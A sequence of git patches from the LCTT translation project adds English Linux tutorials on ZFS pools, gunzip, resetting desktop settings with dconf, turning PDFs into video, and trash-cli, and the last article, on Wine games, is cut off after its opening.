+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://bash-prompt.net
From 26031559eab8a3fd36dc6cd9031d133b048ff173 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:53:24 +0800
Subject: [PATCH 072/371] apply for translation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
28天前的文章,没人要我申领了
---
.../20171201 Launching an Open Source Project A Free Guide.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
index 0d3fa9e18c..dd41e57813 100644
--- a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
+++ b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
Launching an Open Source Project: A Free Guide
============================================================
From 04f453a74f695bfbdd5cc6cdbedb944215691fea Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:07:42 +0800
Subject: [PATCH 073/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Use=20?=
=?UTF-8?q?the=20ZFS=20Filesystem=20on=20Ubuntu=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Use the ZFS Filesystem on Ubuntu Linux.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
diff --git a/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md b/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
new file mode 100644
index 0000000000..8e0e9df7de
--- /dev/null
+++ b/sources/tech/20170928 How to Use the ZFS Filesystem on Ubuntu Linux.md
@@ -0,0 +1,131 @@
+How to Use the ZFS Filesystem on Ubuntu Linux
+======
+There are a myriad of [filesystems available for Linux][1]. So why try a new one? They all work, right? They're not all the same, and some have some very distinct advantages, like ZFS.
+
+### Why ZFS
+
+ZFS is awesome. It's a truly modern filesystem with built-in capabilities that make sense for handling loads of data.
+
+Now, if you're considering ZFS for your ultra-fast NVMe SSD, it might not be the best option. It's slower than others. That's okay, though. It was designed to store huge amounts of data and keep it safe.
+
+ZFS eliminates the need to set up traditional RAID arrays. Instead, you can create ZFS pools, and even add drives to those pools at any time. ZFS pools behave almost exactly like RAID, but the functionality is built right into the filesystem.
+
+ZFS also acts like a replacement for LVM, allowing you to partition and manage partitions on the fly without the need to handle things at a lower level and worry about the associated risks.
+
+It's also a CoW filesystem. Without getting too technical, that means that ZFS protects your data from gradual corruption over time. ZFS creates checksums of files and lets you roll back those files to a previous working version.
+
+### Installing ZFS
+
+![Install ZFS on Ubuntu][2]
+
+Installing ZFS on Ubuntu is very easy, though the process is slightly different for Ubuntu LTS and the latest releases.
+
+ **Ubuntu 16.04 LTS**
+```
+ sudo apt install zfs
+```
+
+ **Ubuntu 17.04 and Later**
+```
+ sudo apt install zfsutils
+```
+
+After you have the utilities installed, you can create ZFS drives and partitions using the tools provided by ZFS.
+
+### Creating Pools
+
+![Create ZFS Pool][3]
+
+Pools are the rough equivalent of RAID in ZFS. They are flexible and can easily be manipulated.
+
+#### RAID0
+
+RAID0 just pools your drives into what behaves like one giant drive. It can increase your drive speeds, but if one of your drives fails, you're probably going to be out of luck.
+
+To achieve RAID0 with ZFS, just create a plain pool.
+```
+sudo zpool create your-pool /dev/sdc /dev/sdd
+```
+
+#### RAID1/MIRROR
+
+You can achieve RAID1 functionality with the `mirror` keyword in ZFS. Raid1 creates a 1-to-1 copy of your drive. This means that your data is constantly backed up. It also increases performance. Of course, you use half of your storage to the duplication.
+```
+sudo zpool create your-pool mirror /dev/sdc /dev/sdd
+```
+
+#### RAID5/RAIDZ1
+
+ZFS implements RAID5 functionality as RAIDZ1. RAID5 requires drives in multiples of three and allows you to keep 2/3 of your storage space by writing backup parity data to 1/3 of the drive space. If one drive fails, the array will remain online, but the failed drive should be replaced ASAP.
+```
+sudo zpool create your-pool raidz1 /dev/sdc /dev/sdd /dev/sde
+```
+
+#### RAID6/RAIDZ2
+
+RAID6 is almost exactly like RAID5, but it works in multiples of four instead of multiples of three. It doubles the parity data to allow up to two drives to fail without bringing the array down.
+```
+sudo zpool create your-pool raidz2 /dev/sdc /dev/sdd /dev/sde /dev/sdf
+```
+
+#### RAID10/Striped Mirror
+
+RAID10 aims to be the best of both worlds by providing both a speed increase and data redundancy with striping. You need drives in multiples of four and will only have access to half of the space. You can create a pool in RAID10 by creating two mirrors in the same pool command.
+```
+sudo zpool create your-pool mirror /dev/sdc /dev/sdd mirror /dev/sde /dev/sdf
+```
+
+### Working With Pools
+
+![ZFS pool Status][4]
+
+There are also some management tools that you have to work with your pools once you've created them. First, check the status of your pools.
+```
+sudo zpool status
+```
+
+#### Updates
+
+When you update ZFS you'll need to update your pools, too. Your pools will notify you of any updates when you check their status. To update a pool, run the following command.
+```
+sudo zpool upgrade your-pool
+```
+
+You can also upgrade them all.
+```
+sudo zpool upgrade -a
+```
+
+#### Adding Drives
+
+You can also add drives to your pools at any time. Tell `zpool` the name of the pool and the location of the drive, and it'll take care of everything.
+```
+sudo zpool add your-pool /dev/sdx
+```
+
+### Other Thoughts
+
+![ZFS in File Browser][5]
+
+ZFS creates a directory in the root filesystem for your pools. You can browse to them by name using your GUI file manager or the CLI.
+
+ZFS is awesomely powerful, and there are plenty of other things that you can do with it, too, but these are the basics. It is an excellent filesystem for working with loads of storage, even if it is just a RAID array of hard drives that you use for your files. ZFS works excellently with NAS systems, too.
+
+Regardless of how stable and robust ZFS is, it's always best to back up your data when you implement something new on your hard drives.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/use-zfs-filesystem-ubuntu-linux/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/best-linux-filesystem-for-ssd/
+[2]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-install.jpg (Install ZFS on Ubuntu)
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-create-pool.jpg (Create ZFS Pool)
+[4]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-pool-status.jpg (ZFS pool Status)
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/zfs-pool-open.jpg (ZFS in File Browser)
From 4c146c68eac8e5f0dc6c424b4e41cb911b1b0d87 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:09:40 +0800
Subject: [PATCH 074/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Gunzip=20?=
=?UTF-8?q?Command=20Explained=20with=20Examples?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Gunzip Command Explained with Examples.md | 100 ++++++++++++++++++
1 file changed, 100 insertions(+)
create mode 100644 sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
diff --git a/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md b/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
new file mode 100644
index 0000000000..cab0c84bd7
--- /dev/null
+++ b/sources/tech/20171002 Linux Gunzip Command Explained with Examples.md
@@ -0,0 +1,100 @@
+Linux Gunzip Command Explained with Examples
+======
+
+We have [already discussed][1] the **gzip** command in Linux. For starters, the tool is used to compress or expand files. To uncompress, the command offers a command line option **-d** , which can be used in the following way:
+
+gzip -d [compressed-file-name]
+
+However, there's an entirely different tool that you can use for uncompressing or expanding archives created by gzip. The tool in question is **gunzip**. In this article, we will discuss the gunzip command using some easy to understand examples. Please note that all examples/instructions mentioned in the tutorial have been tested on Ubuntu 16.04.
+
+### Linux gunzip command
+
+So now we know that compressed files can be restored using either 'gzip -d' or the gunzip command. The basic syntax of gunzip is:
+
+gunzip [compressed-file-name]
+
+The following Q&A-style examples should give you a better idea of how the tool works:
+
+### Q1. How to uncompress archives using gunzip?
+
+This is very simple - just pass the name of the archive file as argument to gunzip.
+
+gunzip [archive-name]
+
+For example:
+
+gunzip file1.gz
+
+[![How to uncompress archives using gunzip][2]][3]
+
+### Q2. How to make gunzip not delete archive file?
+
+As you'd have noticed, the gunzip command deletes the archive file after uncompressing it. However, if you want the archive to stay, you can do that using the **-c** command line option.
+
+gunzip -c [archive-name] > [outputfile-name]
+
+For example:
+
+gunzip -c file1.gz > file1
+
+[![How to make gunzip not delete archive file][4]][5]
+
+So you can see that the archive file wasn't deleted in this case.
+
+### Q3. How to make gunzip put the uncompressed file in some other directory?
+
+We've already discussed the **-c** option in the previous Q &A. To make gunzip put the uncompressed file in a directory other than the present working directory, just provide the absolute path after the redirection operator.
+
+gunzip -c [compressed-file] > [/complete/path/to/dest/dir/filename]
+
+Here's an example:
+
+gunzip -c file1.gz > /home/himanshu/file1
+
+### More info
+
+The following details - taken from the common manpage of gzip/gunzip - should be beneficial for those who want to know more about the command:
+```
+ gunzip takes a list of files on its command line and replaces each file
+ whose name ends with .gz, -gz, .z, -z, or _z (ignoring case) and which
+ begins with the correct magic number with an uncompressed file without
+ the original extension. gunzip also recognizes the special extensions
+ .tgz and .taz as shorthands for .tar.gz and .tar.Z respectively. When
+ compressing, gzip uses the .tgz extension if necessary instead of trun
+ cating a file with a .tar extension.
+
+ gunzip can currently decompress files created by gzip, zip, compress,
+ compress -H or pack. The detection of the input format is automatic.
+ When using the first two formats, gunzip checks a 32 bit CRC. For pack
+ and gunzip checks the uncompressed length. The standard compress format
+ was not designed to allow consistency checks. However gunzip is some
+ times able to detect a bad .Z file. If you get an error when uncom
+ pressing a .Z file, do not assume that the .Z file is correct simply
+ because the standard uncompress does not complain. This generally means
+ that the standard uncompress does not check its input, and happily gen
+ erates garbage output. The SCO compress -H format (lzh compression
+ method) does not include a CRC but also allows some consistency checks.
+```
+
+### Conclusion
+
+As far as basic usage is concerned, there isn't much of a learning curve associated with Gunzip. We've covered pretty much everything that a beginner needs to learn about this command in order to start using it. For more information, head to its [man page][6].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-gunzip-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/linux-gzip-command/
+[2]:https://www.howtoforge.com/images/linux_gunzip_command/gunzip-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_gunzip_command/big/gunzip-basic-usage.png
+[4]:https://www.howtoforge.com/images/linux_gunzip_command/gunzip-c.png
+[5]:https://www.howtoforge.com/images/linux_gunzip_command/big/gunzip-c.png
+[6]:https://linux.die.net/man/1/gzip
From 88692bfd50976741d935d573e27236741f242d38 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:11:21 +0800
Subject: [PATCH 075/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Reset=20Linux=20D?=
=?UTF-8?q?esktop=20To=20Default=20Settings=20With=20A=20Single=20Command?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Default Settings With A Single Command.md | 59 +++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
diff --git a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
new file mode 100644
index 0000000000..84d60dae91
--- /dev/null
+++ b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
@@ -0,0 +1,59 @@
+Reset Linux Desktop To Default Settings With A Single Command
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Reset-Linux-Desktop-To-Default-Settings-720x340.jpg)
+
+A while ago, we shared an article about [**Resetter**][1] - an useful piece of software which is used to reset Ubuntu to factory defaults within few minutes. Using Resetter, anyone can easily reset their Ubuntu system to the state when you installed it in the first time. Today, I stumbled upon a similar thing. No, It's not an application, but a single-line command to reset your Linux desktop settings, tweaks and customization to default state.
+
+### Reset Linux Desktop To Default Settings
+
+This command will reset Ubuntu Unity, Gnome and MATE desktops to the default state. I tested this command on both my **Arch Linux MATE** desktop and **Ubuntu 16.04 Unity** desktop. It worked on both systems. I hope it will work on other desktops as well. I don't have any Linux desktop with GNOME as of writing this, so I couldn't confirm it. But, I believe it will work on Gnome DE as well.
+
+**A word of caution:** Please be mindful that this command will reset all customization and tweaks you made in your system, including the pinned applications in the Unity launcher or Dock, desktop panel applets, desktop indicators, your system fonts, GTK themes, Icon themes, monitor resolution, keyboard shortcuts, window button placement, menu and launcher behaviour etc.
+
+Good thing is it will only reset the desktop settings. It won't affect the other applications that doesn't use dconf. Also, it won't delete your personal data.
+
+Now, let us do this. To reset Ubuntu Unity or any other Linux desktop with GNOME/MATE DEs to its default settings, run:
+```
+dconf reset -f /
+```
+
+This is my Ubuntu 16.04 LTS desktop before running the above command:
+
+[![][2]][3]
+
+As you see, I have changed the desktop wallpaper and themes.
+
+This is how my Ubuntu 16.04 LTS desktop looks like after running that command:
+
+[![][2]][4]
+
+Look? Now, my Ubuntu desktop has gone to the factory settings.
+
+For more details about "dconf" command, refer man pages.
+```
+man dconf
+```
+
+I personally prefer to use "Resetter" over "dconf" command for this purpose. Because, Resetter provides more options to the users. The users can decide which applications to remove, which applications to keep, whether to keep existing user account or create a new user and many. If you're too lazy to install Resetter, you can just use this "dconf" command to reset your Linux system to default settings within few minutes.
+
+And, that's all. Hope this helps. I will be soon here with another useful guide. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/reset-linux-desktop-default-settings-single-command/
+
+作者:[Edwin Arteaga][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com
+[1]:https://www.ostechnix.com/reset-ubuntu-factory-defaults/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Before-resetting-Ubuntu-to-default-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/After-resetting-Ubuntu-to-default-1.png ()
From 0133cccc86f01f4a6e2b2af43006eec31ff2ea8a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:13:08 +0800
Subject: [PATCH 076/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Create?=
=?UTF-8?q?=20A=20Video=20From=20PDF=20Files=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Create A Video From PDF Files In Linux.md | 99 +++++++++++++++++++
1 file changed, 99 insertions(+)
create mode 100644 sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
diff --git a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
new file mode 100644
index 0000000000..2cd028892a
--- /dev/null
+++ b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
@@ -0,0 +1,99 @@
+How To Create A Video From PDF Files In Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Video-1-720x340.jpg)
+
+I have a huge collection of PDF files, mostly Linux tutorials, in my tablet PC. Sometimes I feel too lazy to read them from the tablet. I thought It would be better If I can be able to create a video from PDF files and watch it in a big screen devices like a TV or a Computer. Though I have a little working experience with [**FFMpeg**][1], I am not aware of how to create a movie file using it. After a bit of Google searches, I came up with a good solution. For those who wanted to make a movie file from a set of PDF files, read on. It is not that difficult.
+
+### Create A Video From PDF Files In Linux
+
+For this purpose, you need to install **" FFMpeg"** and **" ImageMagick"** software in your system.
+
+To install FFMpeg, refer the following link.
+
+Imagemagick is available in the official repositories of most Linux distributions.
+
+On **Arch Linux** and derivatives such as **Antergos** , **Manjaro Linux** , run the following command to install it.
+```
+sudo pacman -S imagemagick
+```
+
+**Debian, Ubuntu, Linux Mint:**
+```
+sudo apt-get install imagemagick
+```
+
+**Fedora:**
+```
+sudo dnf install imagemagick
+```
+
+**RHEL, CentOS, Scientific Linux:**
+```
+sudo yum install imagemagick
+```
+
+**SUSE, openSUSE:**
+```
+sudo zypper install imagemagick
+```
+
+After installing ffmpeg and imagemagick, convert your PDF file image format such as PNG or JPG like below.
+```
+convert -density 400 input.pdf picture.png
+```
+
+Here, **-density 400** specifies the horizontal resolution of the output image file(s).
+
+The above command will convert all pages in the given PDF file to PNG format. Each page in the PDF file will be converted into a PNG file and saved in the current directory with file name **picture-1.png** , **picture-2.png** … and so on. It will take a while depending on the number of pages in the input PDF file.
+
+Once all pages in the PDF converted into PNG format, run the following command to create a video file from the PNG files.
+```
+ffmpeg -r 1/10 -i picture-%01d.png -c:v libx264 -r 30 -pix_fmt yuv420p video.mp4
+```
+
+Here,
+
+ * **-r 1/10** : Display each image for 10 seconds.
+ * **-i picture-%01d.png** : Reads all pictures that starts with name **" picture-"**, following with 1 digit (%01d) and ending with **.png**. If the images name comes with 2 digits (I.e picture-10.png, picture11.png etc), use (%02d) in the above command.
+ * **-c:v libx264** : Output video codec (i.e h264).
+ * **-r 30** : framerate of output video
+ * **-pix_fmt yuv420p** : Output video resolution
+ * **video.mp4** : Output video file with .mp4 format.
+
+
+
+Hurrah! The movie file is ready!! You can play it on any devices that supports .mp4 format. Next, I need to find a way to insert a cool music to my video. I hope it won't be difficult either.
+
+If you wanted it in higher pixel resolution, you don't have to start all over again. Just convert the output video file to any other higher/lower resolution of your choice, say 720p, as shown below.
+```
+ffmpeg -i video.mp4 -vf scale=-1:720 video_720p.mp4
+```
+
+Please note that creating a video using ffmpeg requires a good configuration PC. While converting videos, ffmpeg will consume most of your system resources. I recommend to do this in high-end system.
+
+And, that's all for now folks. Hope you find this useful. More good stuffs to come. Stay tuned!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/create-video-pdf-files-linux/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/20-ffmpeg-commands-beginners/
+[2]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=reddit (Click to share on Reddit)
+[3]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=twitter (Click to share on Twitter)
+[4]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=facebook (Click to share on Facebook)
+[5]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=google-plus-1 (Click to share on Google+)
+[6]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=linkedin (Click to share on LinkedIn)
+[7]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=pocket (Click to share on Pocket)
+[8]:whatsapp://send?text=How%20To%20Create%20A%20Video%20From%20PDF%20Files%20In%20Linux%20https%3A%2F%2Fwww.ostechnix.com%2Fcreate-video-pdf-files-linux%2F (Click to share on WhatsApp)
+[9]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=telegram (Click to share on Telegram)
+[10]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=email (Click to email this to a friend)
+[11]:https://www.ostechnix.com/create-video-pdf-files-linux/#print (Click to print)
From 4f073524af507a310953c53c7360bc4c9592fd24 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:14:16 +0800
Subject: [PATCH 077/371] add done: 20171004 How To Create A Video From PDF
Files In Linux.md
---
...04 How To Create A Video From PDF Files In Linux.md | 10 ----------
1 file changed, 10 deletions(-)
diff --git a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
index 2cd028892a..27aa32dc77 100644
--- a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
+++ b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
@@ -87,13 +87,3 @@ via: https://www.ostechnix.com/create-video-pdf-files-linux/
[a]:https://www.ostechnix.com/author/sk/
[1]:https://www.ostechnix.com/20-ffmpeg-commands-beginners/
-[2]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=reddit (Click to share on Reddit)
-[3]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=twitter (Click to share on Twitter)
-[4]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=facebook (Click to share on Facebook)
-[5]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=google-plus-1 (Click to share on Google+)
-[6]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=linkedin (Click to share on LinkedIn)
-[7]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=pocket (Click to share on Pocket)
-[8]:whatsapp://send?text=How%20To%20Create%20A%20Video%20From%20PDF%20Files%20In%20Linux%20https%3A%2F%2Fwww.ostechnix.com%2Fcreate-video-pdf-files-linux%2F (Click to share on WhatsApp)
-[9]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=telegram (Click to share on Telegram)
-[10]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=email (Click to email this to a friend)
-[11]:https://www.ostechnix.com/create-video-pdf-files-linux/#print (Click to print)
From 6c37b7dc5ab02e30959866529e049c68c8583351 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:17:26 +0800
Subject: [PATCH 078/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Trash-Cli=20:=20A?=
=?UTF-8?q?=20Command=20Line=20Interface=20For=20Trashcan=20On=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Line Interface For Trashcan On Linux.md | 145 ++++++++++++++++++
1 file changed, 145 insertions(+)
create mode 100644 sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
diff --git a/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md b/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
new file mode 100644
index 0000000000..29902a588f
--- /dev/null
+++ b/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
@@ -0,0 +1,145 @@
+Trash-Cli : A Command Line Interface For Trashcan On Linux
+======
+Everyone knows about `Trashcan` which is common for all users like Linux, or Windows, or Mac. Whenever you delete a file or folder, it will be moved to trash.
+
+Note that moving files to the trash does not free up space on the file system until the Trashcan is empty.
+
+Trash stores deleted files temporarily which help us to restore when it's necessary, if you don't want these files then delete it permanently (empty the trash).
+
+Make sure, you won't find any files or folders in the trash when you delete using `rm` command. So, think twice before performing rm command. If you did a mistake that's it, it'll go away and you can't restore back. since metadata is not stored on disk nowadays.
+
+Trash is a feature provided by the desktop manager such as GNOME, KDE, and XFCE, etc, as per [freedesktop.org specification][1]. when you delete a file or folder from file manger then it will go to trash and the trash folder can be found @ `$HOME/.local/share/Trash`.
+
+Trash folder contains two folder `files` & `info`. Files folder stores actual deleted files and folders & Info folder contains deleted files & folders information such as file path, deleted date & time in separate file.
+
+You might ask, Why you want CLI utility When having GUI Trashcan, most of the NIX guys (including me) play around CLI instead of GUI even though when they working GUI based system. So, if some one looking for CLI based Trashcan then this is the right choice for them.
+
+### What's Trash-Cli
+
+[trash-cli][2] is a command line interface for Trashcan utility compliant with the FreeDesktop.org trash specifications. It stores the name, original path, deletion date, and permissions of each trashed file.
+
+### How to Install Trash-Cli in Linux
+
+Trash-Cli is available on most of the Linux distribution official repository, so run the following command to install.
+
+For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to install Trash-Cli.
+```
+$ sudo apt install trash-cli
+
+```
+
+For **`RHEL/CentOS`** , use [YUM Command][5] to install Trash-Cli.
+```
+$ sudo yum install trash-cli
+
+```
+
+For **`Fedora`** , use [DNF Command][6] to install Trash-Cli.
+```
+$ sudo dnf install trash-cli
+
+```
+
+For **`Arch Linux`** , use [Pacman Command][7] to install Trash-Cli.
+```
+$ sudo pacman -S trash-cli
+
+```
+
+For **`openSUSE`** , use [Zypper Command][8] to install Trash-Cli.
+```
+$ sudo zypper in trash-cli
+
+```
+
+If you distribution doesn't offer Trash-cli, we can easily install from pip. Your system should have pip package manager, in order to install python packages.
+```
+$ sudo pip install trash-cli
+Collecting trash-cli
+ Downloading trash-cli-0.17.1.14.tar.gz
+Installing collected packages: trash-cli
+ Running setup.py bdist_wheel for trash-cli ... done
+Successfully installed trash-cli-0.17.1.14
+
+```
+
+### How to Use Trash-Cli
+
+It's not a big deal since it's offering native syntax. It provides following commands.
+
+ * **`trash-put:`** Delete files and folders.
+ * **`trash-list:`** Pint Deleted files and folders.
+ * **`trash-restore:`** Restore a file or folder from trash.
+ * **`trash-rm:`** Remove individual files from the trashcan.
+ * **`trash-empty:`** Empty the trashcan(s).
+
+
+
+Let's try some examples to experiment this.
+
+1) Delete files and folders : In our case, we are going to send a file named `2g.txt` and folder named `magi` to Trash by running following command.
+```
+$ trash-put 2g.txt magi
+
+```
+
+You can see the same in file manager.
+
+2) Pint Delete files and folders : To view deleted files and folders, run the following command. As i can see detailed infomation about deleted files and folders such as name, date & time, and file path.
+```
+$ trash-list
+2017-10-01 01:40:50 /home/magi/magi/2g.txt
+2017-10-01 01:40:50 /home/magi/magi/magi
+
+```
+
+3) Restore a file or folder from trash : At any point of time you can restore a files and folders by running following command. It will ask you to enter the choice which you want to restore. In our case, we are going to restore `2g.txt` file, so my option is `0`.
+```
+$ trash-restore
+ 0 2017-10-01 01:40:50 /home/magi/magi/2g.txt
+ 1 2017-10-01 01:40:50 /home/magi/magi/magi
+What file to restore [0..1]: 0
+
+```
+
+4) Remove individual files from the trashcan : If you want to remove specific files from trashcan, run the following command. In our case, we are going to remove `magi` folder.
+```
+$ trash-rm magi
+
+```
+
+5) Empty the trashcan : To remove everything from the trashcan, run the following command.
+```
+$ trash-empty
+
+```
+
+6) Remove older then X days file : Alternatively you can remove older then X days files so, run the following command to do it. In our case, we are going to remove `10` days old items from trashcan.
+```
+$ trash-empty 10
+
+```
+
+trash-cli works great but if you want to try alternative, give a try to [gvfs-trash][9] & [autotrash][10]
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/trash-cli-command-line-trashcan-linux-system/
+
+作者:[2daygeek][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://freedesktop.org/wiki/Specifications/trash-spec/
+[2]:https://github.com/andreafrancia/trash-cli
+[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[5]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[6]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[7]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[8]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
+[9]:http://manpages.ubuntu.com/manpages/trusty/man1/gvfs-trash.1.html
+[10]:https://github.com/bneijt/autotrash
From 7bd2178878959068c011a69a266e10179f4716b4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:22:03 +0800
Subject: [PATCH 079/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20Games=20You?=
=?UTF-8?q?=20Can=20Play=20on=20Linux=20with=20Wine?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0 Games You Can Play on Linux with Wine.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
diff --git a/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md b/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
new file mode 100644
index 0000000000..5bab9d8c65
--- /dev/null
+++ b/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
@@ -0,0 +1,112 @@
+10 Games You Can Play on Linux with Wine
+======
+![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games-feat.jpg)
+
+Linux _does_ have games. It has a lot of them, actually. Linux is a thriving platform for indie gaming, and it 's not too uncommon for Linux to be supported on day one by top indie titles. In stark contrast, however, Linux is still largely ignored by the big-budget AAA developers, meaning that the games your friends are buzzing about probably won't be getting a Linux port anytime soon.
+
+It's not all bad, though. Wine, the Windows compatibility layer for Linux, Mac, and BSD systems, is making huge strides in both the number of titles supported and performance. In fact, a lot of big name games now work under Wine. No, you won't get native performance, but they are playable and can actually run very well, depending on your system. Here are some games that it might surprise you can run with Wine on Linux.
+
+### 10. World of Warcraft
